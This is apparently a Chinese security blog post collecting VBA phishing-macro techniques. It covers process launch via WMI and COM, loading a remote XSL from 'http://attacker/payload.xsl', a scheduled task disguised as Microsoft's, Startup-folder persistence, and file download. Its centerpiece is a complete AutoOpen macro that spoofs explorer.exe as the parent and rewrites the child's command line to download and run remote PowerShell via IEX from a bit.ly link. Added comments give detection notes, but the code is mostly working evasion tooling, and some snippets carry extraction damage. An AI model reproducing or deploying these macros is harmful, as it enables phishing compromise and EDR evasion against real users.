钓鱼文档碎碎念(五)



本文为总结文,总结常用的宏代码,希望能帮到用得到的人。


wmi启动进程


' Process launch via WMI: Win32_Process.Create is called through the winmgmts
' moniker instead of a direct Shell/CreateProcess call from this script.
' NOTE(review): the namespace paths below look like they lost their backslashes
' during extraction (e.g. "\.rootcimv2"); left exactly as published.
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
' A fresh, unconfigured Win32_ProcessStartup instance is passed as the startup configuration.
Set objConfig = objStartup.SpawnInstance_
Set objProcess = GetObject("winmgmts:rootcimv2:Win32_Process")
' errReturn receives the Create() status code; intProcessID receives the new PID.
' Detection note: the child is created by the WMI provider host on the script's behalf,
' so its recorded parent is presumably not the document's host process - confirm in telemetry.
errReturn = objProcess.Create("Notepad.exe", Null, objConfig, intProcessID)


com启动进程


' Process launch via a COM moniker: "new:<CLSID>" instantiates the object by CLSID and
' ShellExecute is reached through its Document.Application property.
' Arguments: file, parameters, working directory, operation, show-window value
' (the final 0 matches SW_HIDE, which is declared as &H0 further down this page).
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc",Null,"C:\Windows\System32",Null,0


加载远程xsl文件


' Loads a remote XSL stylesheet into an MSXML DOM and applies it with transformNode.
' async = False makes load() block until the fetch completes.
' NOTE(review): the curly quotes around the URL are a copy/paste artifact, not valid
' VBA string delimiters; left as published. The URL on this page is a placeholder.
Set xml = CreateObject("Microsoft.XMLDOM")
xml.async = False
Set xsl = xml
xsl.load(“http://attacker/payload.xsl”)
xml.transformNode xsl


注:该方法上线在目标关闭后会失去session,msf可以设置自动迁移进程的参数,如果是cobaltstrike可以使用插件实现,若不清楚如何实现,可后台留言,回头更新。


计划任务


' Registers a one-shot scheduled task through the Task Scheduler COM API.
' The task fires 30 seconds after registration and runs Action.Path.
' Detection note: RegistrationInfo.Author is free text set by the registering code
' ("Microsoft Corporation" here) and must not be used as a trust signal.
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim td: Set td = service.NewTask(0)
td.RegistrationInfo.Author = "Microsoft Corporation"
td.settings.StartWhenAvailable = True
td.settings.Hidden = False
Dim triggers: Set triggers = td.triggers
' Trigger type 1 = time trigger; StartBoundary is built as an ISO-8601-like timestamp below.
Dim trigger: Set trigger = triggers.Create(1)
Dim startTime: ts = DateAdd("s", 30, Now)
' NOTE(review): Right(x, 2) does not zero-pad single-digit fields (Right("3", 2) = "3").
startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
trigger.StartBoundary = startTime
trigger.ID = "TimeTriggerId"
' Action type 0 = execute a program.
Dim Action: Set Action = td.Actions.Create(0)
' NOTE(review): path separators appear to have been lost in extraction; left as published.
Action.Path = "C:WindowsSystem32notepad.exe"
' Task is registered under the name "UpdateTask" in the folder given to GetFolder.
Call service.GetFolder("").RegisterTaskDefinition("UpdateTask", td, 6, , , 3)



文件落地


' Writes a .bat file into the user's Startup folder (logon persistence).
' The file content here is only "notepad.exe".
' NOTE(review): Path has no trailing separator, so Path & "test.bat" is concatenated
' directly onto the folder name; left as published.
Path = CreateObject("WScript.Shell").SpecialFolders("Startup")
Set objFSO = CreateObject("Scripting.FileSystemObject")
' True = overwrite an existing file of the same name.
Set objFile = objFSO.CreateTextFile(Path & "test.bat", True)
objFile.Write "notepad.exe" & vbCrLf
objFile.Close



文件下载


' Downloads a binary with Microsoft.XMLHTTP (synchronous GET, async flag = False)
' and writes the response body to %APPDATA% through an ADODB.Stream.
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe", False
xHttp.Send
With bStrm
    ' Type 1 = binary stream.
    .Type = 1
    .Open
    .write xHttp.responseBody
    ' Second argument 2 = overwrite if the file exists.
    ' NOTE(review): no separator between Environ("APPDATA") and "test.exe"; left as published.
    .savetofile Environ("APPDATA") & "test.exe", 2
End With


' Same download done through the urlmon API instead of a COM object.
' URLDownloadToFileA returns 0 (S_OK) on success; the return value x is not checked here.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _
    ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
' NOTE(review): this call sits at module level in the snippet; it would need to be inside a Sub
' to compile. No separator between Environ("APPDATA") and "test.exe", as in the stream variant.
x = URLDownloadToFileA(0, "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe", Environ("APPDATA") & "test.exe", 0, 0)


' Fetches a page body through an InternetExplorer.Application instance and keeps the
' HTML in `payload`. The loop spins (DoEvents) until readyState reaches 4 (complete).
' ie.Visible is never set, so the window state is whatever the object defaults to.
Set ie = CreateObject("InternetExplorer.Application")
ie.Navigate "https://pastebin.com/raw/tcmMXwMG"
State = 0
Do Until State = 4
DoEvents
State = ie.readyState
Loop
Dim payload: payload = ie.Document.Body.innerHTML


父进程欺骗


' Windows API constants used by the parent-PID spoofing macro below.
' EXTENDED_STARTUPINFO_PRESENT + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS is the pair that lets
' CreateProcess record an arbitrary process as the child's parent (see the f-secure
' "detecting parent PID spoofing" reference at the end of this page).
Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const PROCESS_ALL_ACCESS = &H1F0FFF
Const PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = &H20000
Const TH32CS_SNAPPROCESS = &H2&
Const MAX_PATH = 260

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Data types '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' 64-bit value split into two Longs; used for ReturnLength / PID fields below.
Private Type LARGE_INTEGER
    lowpart As Long
    highpart As Long
End Type
' UNICODE_STRING as laid out for a 64-bit target (lPad is the alignment gap before lpBuffer).
Private Type UNICODE_STRING64
    Length As Integer
    MaxLength As Integer
    lPad As Long
    lpBuffer As LongPtr
End Type
' Partial RTL_USER_PROCESS_PARAMETERS; only CommandLine is used by the macro.
' NOTE(review): field layouts in this file are hand-transcribed for x64 and are not
' verified here against the real structures.
Private Type RTL_USER_PROCESS_PARAMETERS
    Reserved1(15) As Byte
    Reserved2(9) As Long
    CurrentDirectoryPath As UNICODE_STRING64
    CurrentDirectoryHandle As LongPtr
    DllPath As UNICODE_STRING64
    ImagePathName As UNICODE_STRING64
    CommandLine As UNICODE_STRING64
    Environment As LongPtr
End Type
' Result of NtQueryInformationProcess(ProcessBasicInformation); PebBaseAddress is what the macro needs.
Private Type PROCESS_BASIC_INFORMATION
    ExitStatus As Long
    Reserved0 As Long
    PebBaseAddress As LongPtr
    AffinityMask As LARGE_INTEGER
    BasePriority As Long
    Reserved1 As Long
    uUniqueProcessId As LARGE_INTEGER
    uInheritedFromUniqueProcessId As LARGE_INTEGER
End Type
' Partial PEB; only ProcessParameters is read by the macro.
Private Type PEB
    Reserved1(1) As Byte
    BeingDebugged As Byte
    Reserved2(20) As Byte
    Ldr As Long
    ProcessParameters As LongPtr
    Reserved3(519) As Byte
    PostProcessInitRoutine As Long
    Reserved4(135) As Byte
    SessionId As Long
End Type
' ntdll bindings: query basic process info, read and write another process's memory.
Private Declare PtrSafe Function NtQueryInformationProcess Lib "ntdll" ( _
    ByVal hProcess As LongPtr, _
    ByVal ProcessInformationClass As Long, _
    ByRef pProcessInformation As Any, _
    ByVal uProcessInformationLength As Long, _
    ByRef puReturnLength As LongPtr) As Long
Private Declare PtrSafe Function NtReadVirtualMemory Lib "ntdll" ( _
    ByVal hProcess As LongPtr, _
    ByVal BaseAddress As LongPtr, _
    ByRef Buffer As Any, _
    ByVal BufferBytesToRead As Long, _
    ByRef ReturnLength As LARGE_INTEGER) As Long
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "ntdll" ( _
    ByVal hProcess As LongPtr, _
    ByVal VABA As Any, _
    ByVal lpBuffer As Any, _
    ByVal nSS As Long, _
    ByRef NOBW As LARGE_INTEGER) As Boolean
' Handles and ids returned by CreateProcess.
Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type
' STARTUPINFO plus the attribute-list pointer that EXTENDED_STARTUPINFO_PRESENT expects.
Private Type STARTUP_INFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As LongPtr
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type
Private Type STARTUPINFOEX
    STARTUPINFO As STARTUP_INFO
    lpAttributelist As LongPtr
End Type
' From https://foren.activevb.de/archiv/vb-net/thread-76040/beitrag-76164/ReadProcessMemory-fuer-GetComma/
' Toolhelp32 process entry; szexeFile is a fixed-length ANSI buffer of MAX_PATH chars.
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szexeFile As String * MAX_PATH
End Type
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' kernel32 & ntdll bindings ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' CreateProcessA; lpStartupInfo is passed as a raw pointer so a STARTUPINFOEX can be supplied.
Private Declare PtrSafe Function CreateProcess Lib "kernel32.dll" Alias "CreateProcessA" ( _
    ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    lpProcessAttributes As Long, _
    lpThreadAttributes As Long, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    lpEnvironment As Any, _
    ByVal lpCurrentDriectory As String, _
    ByVal lpStartupInfo As LongPtr, _
    lpProcessInformation As PROCESS_INFORMATION _
) As Long
Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" ( _
    ByVal dwAccess As Long, _
    ByVal fInherit As Long, _
    ByVal hObject As Long _
) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "kernel32.dll" ( _
    ByVal hHeap As LongPtr, _
    ByVal dwFlags As Long, _
    ByVal dwBytes As LongPtr _
) As LongPtr
Private Declare PtrSafe Function GetProcessHeap Lib "kernel32.dll" () As LongPtr
' Attribute-list API used to attach PROC_THREAD_ATTRIBUTE_PARENT_PROCESS to the new process.
Private Declare PtrSafe Function InitializeProcThreadAttributeList Lib "kernel32.dll" ( _
    ByVal lpAttributelist As LongPtr, _
    ByVal dwAttributeCount As Integer, _
    ByVal dwFlags As Integer, _
    ByRef lpSize As Long _
) As Boolean
Private Declare PtrSafe Function UpdateProcThreadAttribute Lib "kernel32.dll" ( _
    ByVal lpAttributelist As LongPtr, _
    ByVal dwFlags As Integer, _
    ByVal lpAttribute As Long, _
    ByRef lpValue As LongPtr, _
    ByVal cbSize As Integer, _
    ByRef lpPreviousValue As Integer, _
    ByRef lpReturnSize As Integer _
) As Boolean
' Toolhelp32 enumeration used by getPidByName.
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32.dll" ( _
    ByVal dwFlags As Integer, _
    ByVal th32ProcessID As Integer _
) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32.dll" ( _
    ByVal hSnapshot As LongPtr, _
    ByRef lppe As PROCESSENTRY32 _
) As Boolean
Private Declare PtrSafe Function Process32Next Lib "kernel32.dll" ( _
    ByVal hSnapshot As LongPtr, _
    ByRef lppe As PROCESSENTRY32 _
) As Boolean

' Resumes the main thread of a process created with CREATE_SUSPENDED.
Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Long

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Utility functions '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Finds the PID of a process given its name.
' Walks a Toolhelp32 process snapshot and returns the th32ProcessID of the first entry whose
' szexeFile contains `name` (InStr substring match, not an exact comparison).
' Returns 0 (the Integer default) when no entry matches. The snapshot handle is not closed.
Public Function getPidByName(ByVal name As String) As Integer
    Dim pEntry As PROCESSENTRY32
    Dim continueSearching As Boolean
    ' dwSize must be set before Process32First.
    pEntry.dwSize = LenB(pEntry)
    Dim snapshot As LongPtr
    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, ByVal 0&)
    continueSearching = Process32First(snapshot, pEntry)
    Do
        If InStr(1, pEntry.szexeFile, name) Then
            getPidByName = pEntry.th32ProcessID
            continueSearching = False
        Else
            continueSearching = Process32Next(snapshot, pEntry)
        End If
    Loop While continueSearching
End Function
' Widens an ANSI string to two bytes per character (each Asc value followed by a zero byte)
' into a fixed 401-byte array; AutoOpen uses the result as the buffer for the PEB rewrite.
' NOTE(review): `Dim i, j As Integer` types only j; i is Variant.
Public Function convertStr(ByVal str As String) As Byte()
    Dim i, j As Integer
    Dim result(400) As Byte
    j = 0
    For i = 1 To Len(str): result(j) = Asc(Mid(str, i, 1))
        result(j + 1) = &H0
        j = j + 2
    Next
    convertStr = result
End Function


' Document auto-run entry point (executes when the document opens with macros enabled).
' Two things happen here, in this order:
'   1. A child is created with a spoofed parent: PROC_THREAD_ATTRIBUTE_PARENT_PROCESS points at
'      explorer.exe, so process-tree telemetry shows explorer.exe, not this host, as the parent.
'   2. The child starts CREATE_SUSPENDED with a benign-looking command line (originalCli); the
'      real command line (cmdStr) is then written over CommandLine.lpBuffer in the child's PEB
'      before ResumeThread, so what was logged at creation differs from what actually runs.
' Detection note: compare the command line captured at process creation with the one read back
' from the live process, and treat an Office host calling NtWriteVirtualMemory on a freshly created
' suspended child as high-signal (see the f-secure references at the end of this page).
Sub AutoOpen()
    Dim pi As PROCESS_INFORMATION
    Dim si As STARTUPINFOEX
    Dim nullStr As String
    ' NOTE(review): "Dim pid, result As Integer" types only result; pid is Variant.
    Dim pid, result As Integer
    Dim threadAttribSize As Long
    Dim parentHandle As LongPtr
    Dim originalCli As String
    ' Decoy command line: this is what CreateProcess records for the child.
    originalCli = "powershell.exe -NoExit -c Get-Service -DisplayName '*network*' | Where-Object { $_.Status -eq 'Running' } | Sort-Object DisplayName"
    ' Get a handle on the process to be used as a parent
    pid = getPidByName("explorer.exe")
    parentHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    ' Initialize process attribute list: the first call only sizes it, HeapAlloc provides the
    ' buffer, the second call initializes it. blah captures Err.LastDllError but is never checked.
    result = InitializeProcThreadAttributeList(ByVal 0&, 1, 0, threadAttribSize)
    blah = Err.LastDllError
    si.lpAttributelist = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, threadAttribSize)
    blah = Err.LastDllError
    result = InitializeProcThreadAttributeList(si.lpAttributelist, 1, 0, threadAttribSize)
    ' Set the parent to be our previous handle
    result = UpdateProcThreadAttribute(si.lpAttributelist, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, parentHandle, Len(parentHandle), ByVal 0&, ByVal 0&)
    ' Set the size of cb (see https://docs.microsoft.com/en-us/windows/desktop/api/winbase/ns-winbase-_startupinfoexa#remarks)
    si.STARTUPINFO.cb = LenB(si)
    ' Hide new process window (dwFlags = 1 is STARTF_USESHOWWINDOW, which makes wShowWindow apply)
    si.STARTUPINFO.dwFlags = 1
    si.STARTUPINFO.wShowWindow = SW_HIDE
    ' dwCreationFlags &H80014 = EXTENDED_STARTUPINFO_PRESENT (&H80000) Or CREATE_NEW_CONSOLE (&H10)
    ' Or CREATE_SUSPENDED (&H4); the suspended start is what makes the PEB rewrite below possible.
    result = CreateProcess( _
        nullStr, _
        originalCli, _
        ByVal 0&, _
        ByVal 0&, _
        1&, _
        &H80014, _
        ByVal 0&, _
        nullStr, _
        VarPtr(si), _
        pi _
    )
    ' Spoofing of cli arguments
    Dim size As LongPtr
    Dim PEB As PEB
    Dim pbi As PROCESS_BASIC_INFORMATION
    Dim newProcessHandle As LongPtr
    Dim success As Boolean
    Dim parameters As RTL_USER_PROCESS_PARAMETERS
    Dim cmdStr As String
    Dim cmd() As Byte
    Dim liRet As LARGE_INTEGER
    newProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pi.dwProcessId)
    ' ProcessInformationClass 0 = ProcessBasicInformation; pbi.PebBaseAddress is the child's PEB.
    result = NtQueryInformationProcess(newProcessHandle, 0, pbi, Len(pbi), size)
    success = NtReadVirtualMemory(newProcessHandle, pbi.PebBaseAddress, PEB, Len(PEB), liRet)
    ' peb.ProcessParameters now contains the address to the parameters - read them
    success = NtReadVirtualMemory(newProcessHandle, PEB.ProcessParameters, parameters, Len(parameters), liRet)
    blah = Err.LastDllError
    ' Real command line; convertStr widens it to two bytes per character. The trailing "#" begins
    ' a PowerShell comment, presumably so any leftover tail of the longer decoy string is ignored.
    cmdStr = "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://bit.ly/2TxpA4h')) #"
    cmd = convertStr(cmdStr)
    ' Overwrites the existing UNICODE_STRING buffer in place; the Length field is not updated.
    success = NtWriteVirtualMemory(newProcessHandle, parameters.CommandLine.lpBuffer, StrPtr(cmd), 2 * Len(cmdStr), liRet)
    ' Release the suspended main thread. No return value of any call above is checked.
    ResumeThread (pi.hThread)
End Sub



写在后面


与flash钓鱼一样,宏钓鱼终将被时代所淘汰,希望这几篇文章能给各位师傅们提供一些思路,让其在最后的时间里,再放光芒




参考文章:


https://blog.f-secure.com/dechaining-macros-and-evading-edr/

https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba

https://blog.f-secure.com/detecting-parent-pid-spoofing/






本文始发于微信公众号(鸿鹄实验室):钓鱼文档碎碎念(五)
